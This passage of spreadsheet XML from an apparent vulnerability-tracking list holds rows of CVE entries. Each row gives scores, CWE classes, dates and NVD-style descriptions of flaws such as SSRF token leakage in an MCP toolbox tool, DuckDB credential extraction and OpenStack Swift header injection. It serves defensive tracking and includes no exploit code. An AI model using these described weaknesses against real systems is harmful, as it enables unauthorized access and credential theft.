      <c r="C4383" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4383" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4383" s="5" t="inlineStr"/>
      <c r="F4383" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4383" s="5" t="inlineStr"/>
      <c r="H4383" s="5" t="inlineStr"/>
      <c r="I4383" s="5" t="inlineStr">
        <is>
          <t>2026-07-27</t>
        </is>
      </c>
      <c r="J4383" s="5" t="inlineStr"/>
      <c r="K4383" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4383" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) and credential exfiltration vulnerability exists in the cloud-healthcare-fhir-fetch-page tool of googleapis/mcp-toolbox.
The tool takes an unvalidated pageURL parameter from the client and issues an HTTP GET request to it using an authenticated client. The underlying transport automatically attaches an Authorization: Bearer  header to every outbound request regardless of the destination host. An attacker can supply an arbitrary external URL to the pageURL parameter (either directly via the tool execution payload or implicitly via data-driven pagination tracking loops), leading Toolbox into sending its OAuth/service-account access token to an attacker-controlled listener. Depending on the configuration, this leaks either the end-user's token or the broader service-account access token (ADC), potentially exposing Protected Health Information (PHI) and secondary Google Cloud Platform services.</t>
        </is>
      </c>
      <c r="M4383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16481</t>
        </is>
      </c>
    </row>
    <row r="4384">
      <c r="A4384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17084</t>
        </is>
      </c>
      <c r="C4384" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4384" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4384" s="5" t="inlineStr"/>
      <c r="F4384" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G4384" s="5" t="inlineStr"/>
      <c r="H4384" s="5" t="inlineStr"/>
      <c r="I4384" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4384" s="5" t="inlineStr"/>
      <c r="K4384" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L4384" s="5" t="inlineStr">
        <is>
          <t>The "stringprep" module didn't process characters from RFC 3454 tables 
B.2 or B.3 correctly: the latest Unicode codepoint attributes were used 
instead of the specified Unicode 3.2.0. This behavior would cause 
mismatches when processing domain names using IDNA 2003 (the "idna" 
codec) and the in_table_b2() function of the "stringprep" module. This 
only affects domain names containing characters that were not previously
 registered or had their Unicode attributes such as case-folding 
behavior updated since Unicode 3.2.0.</t>
        </is>
      </c>
      <c r="M4384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17084</t>
        </is>
      </c>
    </row>
    <row r="4385">
      <c r="A4385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17610</t>
        </is>
      </c>
      <c r="C4385" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4385" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4385" s="5" t="inlineStr"/>
      <c r="F4385" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4385" s="5" t="inlineStr"/>
      <c r="H4385" s="5" t="inlineStr"/>
      <c r="I4385" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4385" s="5" t="inlineStr"/>
      <c r="K4385" s="5" t="inlineStr">
        <is>
          <t>CWE-404</t>
        </is>
      </c>
      <c r="L4385" s="5" t="inlineStr">
        <is>
          <t>In SiSDK v2026.6.0 and earlier, high network traffic loads can cause a dropped ACK leading to a denial of service. This is only present for EFR32MG24 and EFR32MG26 devices running concurrent multiprotocol Zigbee and Thread.</t>
        </is>
      </c>
      <c r="M4385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17610</t>
        </is>
      </c>
    </row>
    <row r="4386">
      <c r="A4386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18368</t>
        </is>
      </c>
      <c r="C4386" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4386" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4386" s="5" t="inlineStr"/>
      <c r="F4386" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4386" s="5" t="inlineStr"/>
      <c r="H4386" s="5" t="inlineStr"/>
      <c r="I4386" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4386" s="5" t="inlineStr"/>
      <c r="K4386" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L4386" s="5" t="inlineStr">
        <is>
          <t>In Teltonika Networks RUTOS devices, a vulnerability exists in modbusgwd
 due to improper handling of Modbus TCP request data. A remote, 
unauthenticated attacker with access to the affected service could 
trigger a heap-based buffer overflow, resulting in a denial of service.</t>
        </is>
      </c>
      <c r="M4386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18368</t>
        </is>
      </c>
    </row>
    <row r="4387">
      <c r="A4387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24225</t>
        </is>
      </c>
      <c r="C4387" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4387" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4387" s="5" t="inlineStr"/>
      <c r="F4387" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4387" s="5" t="inlineStr"/>
      <c r="H4387" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="I4387" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4387" s="5" t="inlineStr"/>
      <c r="K4387" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4387" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the standalone MM firmware where an attacker could be able to cause an out-of-bounds read. A successful exploit of this vulnerability might lead to information disclosure.</t>
        </is>
      </c>
      <c r="M4387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24225</t>
        </is>
      </c>
    </row>
    <row r="4388">
      <c r="A4388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25250</t>
        </is>
      </c>
      <c r="C4388" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4388" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4388" s="5" t="inlineStr"/>
      <c r="F4388" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4388" s="5" t="inlineStr"/>
      <c r="H4388" s="5" t="inlineStr"/>
      <c r="I4388" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J4388" s="5" t="inlineStr"/>
      <c r="K4388" s="5" t="inlineStr">
        <is>
          <t>CWE-325</t>
        </is>
      </c>
      <c r="L4388" s="5" t="inlineStr">
        <is>
          <t>EAZ EazyFix 12.9 allows a Security Feature Bypass related to a "Missing Cryptographic Step" associated with "Secure Boot disable."</t>
        </is>
      </c>
      <c r="M4388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25250</t>
        </is>
      </c>
    </row>
    <row r="4389">
      <c r="A4389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45415</t>
        </is>
      </c>
      <c r="C4389" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4389" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4389" s="5" t="inlineStr"/>
      <c r="F4389" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4389" s="5" t="inlineStr"/>
      <c r="H4389" s="5" t="inlineStr"/>
      <c r="I4389" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J4389" s="5" t="inlineStr"/>
      <c r="K4389" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4389" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. Prior to 0.30.9, from 0.31.0 before 0.31.5, and in 0.32.0.rc1 before 0.32.0.rc2, the /admin/csv_census/census_logs record-management endpoints do not enforce full administrator authorization before rendering or mutating Decidim::Verifications::CsvDatum, allowing a participant manager to create, alter, or remove census records. This issue is fixed in versions 0.30.9, 0.31.5, and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M4389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45415</t>
        </is>
      </c>
    </row>
    <row r="4390">
      <c r="A4390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47624</t>
        </is>
      </c>
      <c r="C4390" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4390" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4390" s="5" t="inlineStr"/>
      <c r="F4390" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4390" s="5" t="inlineStr"/>
      <c r="H4390" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="I4390" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4390" s="5" t="inlineStr"/>
      <c r="K4390" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L4390" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in UEFI where a Attacker may cause a/an CWE-693 by privileged local user. A successful exploit of this vulnerability may allow an attacker to bypass administrator password protection in UEFi.</t>
        </is>
      </c>
      <c r="M4390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47624</t>
        </is>
      </c>
    </row>
    <row r="4391">
      <c r="A4391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53508</t>
        </is>
      </c>
      <c r="C4391" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4391" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4391" s="5" t="inlineStr"/>
      <c r="F4391" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4391" s="5" t="inlineStr"/>
      <c r="H4391" s="5" t="inlineStr"/>
      <c r="I4391" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J4391" s="5" t="inlineStr"/>
      <c r="K4391" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-73, CWE-918</t>
        </is>
      </c>
      <c r="L4391" s="5" t="inlineStr">
        <is>
          <t>oasdiff is a command-line and Go package that compares and detects breaking changes in OpenAPI specs. From version 1.13.2 through version 1.18.0, oasdiff did not enforce --allow-external-refs=false (library: openapi3.Loader.IsExternalRefsAllowed = false) when loading a spec from a git revision (the rev:path form, e.g. main:openapi.yaml). External $refs were resolved on that load path even when external refs were explicitly disabled, so the mitigation silently did not apply there. This issue has been patched in version 1.18.1.</t>
        </is>
      </c>
      <c r="M4391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53508</t>
        </is>
      </c>
    </row>
    <row r="4392">
      <c r="A4392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56101</t>
        </is>
      </c>
      <c r="C4392" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4392" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4392" s="5" t="inlineStr"/>
      <c r="F4392" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4392" s="5" t="inlineStr"/>
      <c r="H4392" s="5" t="inlineStr"/>
      <c r="I4392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4392" s="5" t="inlineStr"/>
      <c r="K4392" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="L4392" s="5" t="inlineStr">
        <is>
          <t>OpenBSD before commit 1ee99df contains an inverted comparison vulnerability in the ieee80211_michael_mic_failure() function within sys/net80211/ieee80211_crypto_tkip.c that allows unauthenticated attackers within RF range to trigger denial of service by sending two malformed TKIP frames separated by more than 60 seconds. Attackers can exploit the reversed TKIP MIC failure countermeasure window check to deauthenticate all associated TKIP stations and block reassociation for up to 90 seconds, while within-window MIC failures that should engage countermeasures are silently discarded, leaving key-recovery attempts undetected.</t>
        </is>
      </c>
      <c r="M4392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56101</t>
        </is>
      </c>
    </row>
    <row r="4393">
      <c r="A4393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58139</t>
        </is>
      </c>
      <c r="C4393" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4393" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4393" s="5" t="inlineStr"/>
      <c r="F4393" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4393" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H4393" s="5" t="inlineStr"/>
      <c r="I4393" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J4393" s="5" t="inlineStr"/>
      <c r="K4393" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4393" s="5" t="inlineStr">
        <is>
          <t>The DuckDB AWS extension for DuckDB contains a security policy bypass vulnerability that allows any database user with SQL execution permissions to extract plaintext AWS credentials by calling the load_aws_credentials function with the redact_secret parameter set to false, circumventing the database-wide allow_unredacted_secrets=false policy. Attackers can invoke this single function to retrieve the underlying AWS credential chain including access_key_id, secret_access_key, session_token, and region in plaintext, which are immediately valid against AWS APIs and particularly impactful in managed environments where pg_duckdb is preloaded and an AWS credential chain such as IMDSv2, IRSA, ECS task role, or EC2 instance role is reachable.</t>
        </is>
      </c>
      <c r="M4393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58139</t>
        </is>
      </c>
    </row>
    <row r="4394">
      <c r="A4394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62672</t>
        </is>
      </c>
      <c r="C4394" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4394" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4394" s="5" t="inlineStr"/>
      <c r="F4394" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4394" s="5" t="inlineStr"/>
      <c r="H4394" s="5" t="inlineStr"/>
      <c r="I4394" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4394" s="5" t="inlineStr"/>
      <c r="K4394" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L4394" s="5" t="inlineStr">
        <is>
          <t>Grav is a file-based Web platform. Prior to 2.0.4, Grav allowlists the regex_replace filter and function in system/config/security.yaml, and GravExtension::regexReplace() passes an editor-controlled pattern directly to preg_replace(). When security.twig_content.process_enabled is enabled, an authenticated page editor can publish a catastrophically backtracking pattern that consumes PHP worker CPU and denies service to site visitors. This issue is fixed in version 2.0.4.</t>
        </is>
      </c>
      <c r="M4394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62672</t>
        </is>
      </c>
    </row>
    <row r="4395">
      <c r="A4395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65985</t>
        </is>
      </c>
      <c r="C4395" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4395" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4395" s="5" t="inlineStr"/>
      <c r="F4395" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4395" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H4395" s="5" t="inlineStr"/>
      <c r="I4395" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4395" s="5" t="inlineStr"/>
      <c r="K4395" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4395" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. In 1.3.2 and earlier, the device-webapi-request Socket.IO handler in server/runtime/index.js permits an authenticated non-admin runtime user to control property.address, causing the FUXA server to issue an outbound HTTP or HTTPS request and return the response body to the requesting socket. The attacker can use the server as a read SSRF oracle against reachable internal services or cloud metadata endpoints, with impact depending on the FUXA host's deployment network. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="M4395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65985</t>
        </is>
      </c>
    </row>
    <row r="4396">
      <c r="A4396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67335</t>
        </is>
      </c>
      <c r="C4396" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4396" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4396" s="5" t="inlineStr"/>
      <c r="F4396" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4396" s="5" t="inlineStr"/>
      <c r="H4396" s="5" t="inlineStr"/>
      <c r="I4396" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J4396" s="5" t="inlineStr"/>
      <c r="K4396" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L4396" s="5" t="inlineStr">
        <is>
          <t>better-auth versions before 1.6.2 fail to validate the OAuth state parameter against the stored nonce when using cookie-backed state storage without PKCE. Attackers can forge the state parameter and supply an attacker-controlled authorization code to create authenticated sessions bound to the attacker's external identity or persistently link attacker accounts to victim profiles.</t>
        </is>
      </c>
      <c r="M4396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67335</t>
        </is>
      </c>
    </row>
    <row r="4397">
      <c r="A4397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70603</t>
        </is>
      </c>
      <c r="C4397" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4397" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4397" s="5" t="inlineStr"/>
      <c r="F4397" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4397" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4397" s="5" t="inlineStr"/>
      <c r="I4397" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J4397" s="5" t="inlineStr"/>
      <c r="K4397" s="5" t="inlineStr">
        <is>
          <t>CWE-158, CWE-20</t>
        </is>
      </c>
      <c r="L4397" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.6, 40.9.0, 41.1.1, and 42.0.0-beta.1, shell.openPath() did not reject paths containing embedded null bytes. Apps that perform string-only validation of file paths, for example checking the file extension, before passing them to shell.openPath() could be bypassed, allowing an attacker-controlled path to open a different file than the one that passed validation. Apps are only affected if they pass paths derived from untrusted input to shell.openPath() and rely on string-based validation without a filesystem check. This issue is fixed in versions 39.8.6, 40.9.0, 41.1.1, and 42.0.0-beta.1.</t>
        </is>
      </c>
      <c r="M4397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70603</t>
        </is>
      </c>
    </row>
    <row r="4398">
      <c r="A4398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71191</t>
        </is>
      </c>
      <c r="C4398" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4398" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4398" s="5" t="inlineStr"/>
      <c r="F4398" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4398" s="5" t="inlineStr"/>
      <c r="H4398" s="5" t="inlineStr"/>
      <c r="I4398" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J4398" s="5" t="inlineStr"/>
      <c r="K4398" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4398" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Swift through 2.38.0, S3API middleware does not enforce that semantic x-amz-* headers are covered by the SigV4 signature on presigned URL requests. An attacker who obtains a presigned PUT URL can inject an unsigned X-Amz-Copy-Source header, causing Swift to perform a server-side copy from an arbitrary source object using the signer's authorization context. The attacker can read any object the signer has access to, provided the target project_id, container name, and object name are known. This affects all deployments using the default s3_acl=false configuration.</t>
        </is>
      </c>
      <c r="M4398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71191</t>
        </is>
      </c>
    </row>
    <row r="4399">
      <c r="A4399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71192</t>
        </is>
      </c>
      <c r="C4399" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4399" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4399" s="5" t="inlineStr"/>
      <c r="F4399" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4399" s="5" t="inlineStr"/>
      <c r="H4399" s="5" t="inlineStr"/>
      <c r="I4399" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J4399" s="5" t="inlineStr"/>
      <c r="K4399" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4399" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Swift through 2.38.0, the S3API middleware does not sanitize Swift-native control headers (X-Copy-From, X-Copy-From-Account) from S3 API requests when s3_acl=true. An
attacker can inject these headers into a signed PUT request targeting their own bucket, causing Swift to perform a server-side copy from another tenant's private object. The source object authorization is bypassed because the S3API middleware has already authorized the request against the destination. The attacker can read any object whose project_id, container name, and object name are known, regardless of the source object's ACLs or ownership. This requires the non-default s3_acl=true configuration.</t>
        </is>
      </c>
      <c r="M4399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71192</t>
        </is>
      </c>
    </row>
    <row r="4400">
      <c r="A4400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73627</t>
        </is>
      </c>
      <c r="C4400" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4400" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4400" s="5" t="inlineStr"/>
      <c r="F4400" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4400" s="5" t="inlineStr"/>
      <c r="H4400" s="5" t="inlineStr"/>
      <c r="I4400" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4400" s="5" t="inlineStr"/>
      <c r="K4400" s="5" t="inlineStr">
        <is>
          <t>CWE-602</t>
        </is>
      </c>
      <c r="L4400" s="5" t="inlineStr">
        <is>
          <t>JupyterLab (pip package 'jupyterlab') versions &gt;=4.1.0,&lt;=4.5.9 and &gt;=4.6.0,&lt;=4.6.1 contain a plugin manager lock-rule enforcement bypass. Two server-side enforcement gaps allow an authenticated user to circumvent administrator lock rules by making direct requests to the /lab/api/plugins endpoint, enabling or disabling plugins that were locked — including child plugins of multi-plugin extensions and plugins locked via the 'lock all' mechanism. This can impact data integrity and bypass hardening or restrictions (e.g., download/upload limits) implemented through locked plugins. Fixed in versions 4.6.2 and 4.5.10.</t>
        </is>
      </c>
      <c r="M4400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73627</t>
        </is>
      </c>
    </row>
    <row r="4401">
      <c r="A4401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77123</t>
        </is>
      </c>
      <c r="C4401" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4401" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4401" s="5" t="inlineStr"/>
      <c r="F4401" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4401" s="5" t="inlineStr"/>
      <c r="H4401" s="5" t="inlineStr"/>
      <c r="I4401" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J4401" s="5" t="inlineStr"/>
      <c r="K4401" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L4401" s="5" t="inlineStr">
        <is>
          <t>Nexus Repository 3 contains a sensitive information disclosure vulnerability in the capability read API. An account holding the nexus:capabilities:read privilege can retrieve the plaintext shared secret configured on a webhook capability, which is intended to be masked from all API responses. This issue affects Nexus Repository 3 versions 3.2.0 through 3.95.x, and is fixed in version 3.96.0.</t>
        </is>
      </c>
      <c r="M4401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77123</t>
        </is>
      </c>
    </row>
    <row r="4402">
      <c r="A4402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78216</t>
        </is>
      </c>
      <c r="C4402" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4402" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4402" s="5" t="inlineStr"/>
      <c r="F4402" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4402" s="5" t="inlineStr"/>
      <c r="H4402" s="5" t="inlineStr"/>
      <c r="I4402" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4402" s="5" t="inlineStr"/>
      <c r="K4402" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="L4402" s="5" t="inlineStr">
        <is>
          <t>AshLua exposes Ash read actions to Lua scripts run through an eval action. A read call accepts an operation (list, min, max, first, sum, avg) that builds an ad-hoc Ash.Query.Aggregate over a named field and returns its raw value.
Ash field policies redact forbidden fields on returned records (replacing them with %Ash.ForbiddenField{}), but that redaction does not apply to aggregate values. A script could therefore read a field the calling actor's field policies forbid by requesting it as an aggregate instead of as a field. This includes fields that are public? true but restricted per-actor by a field policy, such as sensitive PII. The prior hardening only enforced the exposed-field allow-list (field visibility), which is a separate axis from per-actor field-policy authorization.
The fix authorizes the aggregated field against the resource's field policies, so aggregating over a field the actor may not see is refused or scoped to the rows where it is visible.
This issue affects ash_lua: from 0.1.0 before 0.2.2.</t>
        </is>
      </c>
      <c r="M4402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78216</t>
        </is>
      </c>
    </row>
    <row r="4403">
      <c r="A4403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78230</t>
        </is>
      </c>
      <c r="C4403" s="5" t="n">
        <v>6</v>
      </c>
      <c r="D4403" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
